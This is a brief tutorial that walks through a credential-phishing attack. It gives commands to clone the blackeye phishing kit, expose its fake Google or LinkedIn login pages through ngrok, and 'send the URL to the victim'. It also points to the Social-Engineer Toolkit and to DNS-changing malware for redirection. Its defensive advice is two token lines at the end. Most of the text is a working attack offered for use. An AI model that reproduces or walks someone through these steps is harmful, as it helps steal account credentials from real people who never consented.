Phishing Attack


Phishing is a social engineering attack used to gain access to a victim's personal or business account. Social engineering is the term for a broad range of malicious activities accomplished through human interaction. It uses psychological manipulation to trick users into making security mistakes or giving away sensitive information.

Set up a fake website

  1. Clone the GitHub repository named blackeye:

        git clone https://github.com/An0nUD4Y/blackeye.git
        cd blackeye

  2. Set up an ngrok account at ngrok.com and install it (Getting Started → Setup & Installation → Download for Linux → Run commands):

        unzip ngrok-stable-linux-amd64.zip
        cp ngrok blackeye
        ./ngrok authtoken [personal_token]
        ./ngrok http 80

  3. Go to the blackeye folder and run it:

        cd blackeye
        sudo ./blackeye # option: 6 for google, 9 for linkedin

  4. See the running status at http://127.0.0.1:4040/status. Send the URL to the victim.

Phishing emails, smishing texts or vishing phone calls

Here we can use the Social-Engineer Toolkit (installed by default in Kali Linux). You can send the fake link to the victim, or a malware file that changes the victim's DNS server so that they are redirected to another website.

How to protect yourself?

  1. Never click on links.
  2. Use a good spam filter for your email.
